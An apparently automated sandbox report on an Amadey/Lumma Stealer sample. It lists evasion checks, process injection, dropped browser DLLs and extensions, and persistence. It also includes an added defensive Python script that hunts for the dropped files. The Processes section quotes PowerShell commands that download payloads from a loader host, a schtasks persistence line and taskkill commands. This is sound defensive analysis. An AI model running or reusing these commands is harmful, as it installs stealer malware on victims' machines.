Malware Analysis Report

2024-11-30 05:12

Sample ID 240519-xg1r5sce9t
Target 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA256 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
Tags
amadey lumma c767c0 discovery evasion execution stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb

Threat Level: Known bad

The file 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb was found to be: Known bad.

Malicious Activity Summary

amadey lumma c767c0 discovery evasion execution stealer trojan

Amadey

Lumma Stealer

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Blocklisted process makes network request

Checks computer location settings

Checks BIOS information in registry

Identifies Wine through registry keys

Loads dropped DLL

Executes dropped EXE

Checks installed software on the system

Looks up external IP address via web service

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Script User-Agent

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-19 18:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-19 18:50

Reported

2024-05-19 18:52

Platform

win10v2004-20240426-en

Max time kernel

143s

Max time network

129s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"

Signatures

Amadey

trojan amadey

Lumma Stealer

stealer lumma

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\shlwapi_p.dll C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3680 set thread context of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File opened for modification C:\Program Files\Online Security\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\scoped_dir4984_1382533742\extension.zip C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Online Security\is-JCPNV.tmp C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A
File created C:\Program Files\Online Security\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\axplons.job C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe N/A
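The two tables above are the persistent footprint of this detonation: application manifests and a Shlwapi.dll copy written next to chrome.exe and msedge.exe, a security.crx plus updates.xml staged in each browser's Extensions folder, an "Online Security" Inno Setup product under Program Files, a shlwapi_p.dll in System32, and the axplons.job the sample itself wrote to C:\Windows\Tasks. The report does not show the manifest contents, so whether they redirect the browsers' Shlwapi.dll loads into the dropped copy is an inference; the paths themselves are concrete enough to hunt for. What follows is an added example, not part of the report or the sandbox's tooling: a Python check that looks for those paths under a system-drive root and hashes anything it finds against the SHA-256 values listed in the Files section. The labels are this example's own reading of the tables, and demo() builds a throw-away directory tree with placeholder contents so the code runs anywhere; on a live host or a mounted image, pass the drive root instead.

```python
"""Host check for the file-system artifacts in the "Drops file" tables.

Added example, not part of the sandbox report. Relative paths are the ones
the tables show (drive letter stripped); labels are this example's reading.
"""
import hashlib
import tempfile
from pathlib import Path

# '/'-separated so the same check runs against a mounted image under Linux.
ARTIFACTS = {
    "Windows/system32/shlwapi_p.dll": "System32 DLL dropped by i0.tmp",
    "Windows/Tasks/axplons.job": "legacy job file for the axplons.exe copy",
    "Program Files/Google/Chrome/Application/chrome.exe.manifest": "app manifest beside chrome.exe",
    "Program Files/Google/Chrome/Application/dlls/dlls.manifest": "manifest for the dlls folder",
    "Program Files/Google/Chrome/Application/dlls/Shlwapi.dll": "Shlwapi.dll copy beside chrome.exe",
    "Program Files/Google/Chrome/Application/Extensions/security.crx": "staged extension",
    "Program Files/Google/Chrome/Application/Extensions/updates.xml": "extension update descriptor",
    "Program Files (x86)/Microsoft/Edge/Application/msedge.exe.manifest": "app manifest beside msedge.exe",
    "Program Files (x86)/Microsoft/Edge/Application/dlls/dlls.manifest": "manifest for the dlls folder",
    "Program Files (x86)/Microsoft/Edge/Application/dlls/Shlwapi.dll": "Shlwapi.dll copy beside msedge.exe",
    "Program Files (x86)/Microsoft/Edge/Application/Extensions/security.crx": "staged extension",
    "Program Files (x86)/Microsoft/Edge/Application/Extensions/updates.xml": "extension update descriptor",
    "Program Files/Online Security/unins000.dat": "Inno Setup uninstall data for 'Online Security'",
}

# SHA-256 values from the Files section, keyed to the dropped file they belong to.
KNOWN_SHA256 = {
    "3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb": "sample / axplons.exe",
    "919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226": "Newoff.exe",
    "a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346": "vpn-1002.exe",
    "c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475": "lumma1234.exe",
    "d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e": "i0.exe",
    "72f7dbc5502cfce6de9184df4466a84fbbaa828048a183b0eb1690e79c886903": "i0.tmp",
}


def sha256_of(path, chunk=1 << 20):
    """Stream-hash a file so large drops do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def lookup_hash(digest):
    """Name of the report artifact with this SHA-256, or None."""
    return KNOWN_SHA256.get(digest.lower())


def scan_artifacts(root):
    """One record per ARTIFACTS path that exists under root (system drive or image mount)."""
    root = Path(root)
    found = []
    for rel, label in ARTIFACTS.items():
        p = root.joinpath(*rel.split("/"))
        if p.is_file():
            digest = sha256_of(p)
            found.append({"path": rel, "label": label, "sha256": digest,
                          "known_as": lookup_hash(digest)})
    return found


def scan_temp_for_known(temp_dir):
    """Hash every file under a Temp directory; return (relative path, artifact name) matches."""
    hits = []
    for p in Path(temp_dir).rglob("*"):
        if p.is_file():
            name = lookup_hash(sha256_of(p))
            if name:
                hits.append((str(p.relative_to(temp_dir)), name))
    return hits


def demo():
    """Constructed tree: two browser artifacts plus an unrelated file, all with dummy contents."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel in ("Program Files/Google/Chrome/Application/dlls/Shlwapi.dll",
                    "Program Files/Google/Chrome/Application/Extensions/updates.xml",
                    "Program Files/Google/Chrome/Application/chrome.exe"):
            p = root.joinpath(*rel.split("/"))
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_bytes(b"constructed placeholder for " + rel.encode())
        return scan_artifacts(root)


if __name__ == "__main__":
    for rec in demo():
        print(rec["path"], "->", rec["label"], "| known as:", rec["known_as"])
```

Because the placeholder files in demo() are not the real drops, their known_as field comes back None; on a real host a hit against KNOWN_SHA256 ties the file to a specific stage of this chain, while a hit on the path alone still warrants pulling the file, since the installer could be rebuilt with new hashes and the same layout.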

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3740 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 3740 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 3740 wrote to memory of 3112 N/A C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
PID 3112 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 3112 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 3112 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
PID 2896 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 2896 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 2896 wrote to memory of 3768 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Windows\SysWOW64\schtasks.exe
PID 2896 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 2896 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 2896 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe
PID 3112 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 3112 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 3112 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 3680 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2040 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4916 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 3672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 2876 wrote to memory of 3672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 2876 wrote to memory of 3672 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i0.exe
PID 2876 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 4548 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3672 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp
PID 3672 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp
PID 3672 wrote to memory of 5076 N/A C:\Users\Admin\AppData\Local\Temp\i0.exe C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp
PID 5076 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 1204 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1204 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4984 wrote to memory of 4916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4984 wrote to memory of 4916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 5076 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\system32\cmd.exe
PID 5076 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe
PID 5076 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe
PID 5076 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe
PID 5076 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp C:\Windows\SYSTEM32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe

"C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

"C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe

"C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"

C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe

"C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsm4C6C.tmp\abc.bat"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"

C:\Users\Admin\AppData\Local\Temp\i0.exe

i0.exe /verysilent /sub=1000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"

C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-93VEQ.tmp\i0.tmp" /SL5="$130042,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=1000

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\xbweti

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xdc,0x110,0x7ffd3f3dab58,0x7ffd3f3dab68,0x7ffd3f3dab78

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\xbweti.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\dhglhc > "C:\Users\Admin\AppData\Local\Temp\is-22S8A.tmp\~execwithresult.txt""

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /f /im "msedge.exe"

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /f /im "chrome.exe"

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe

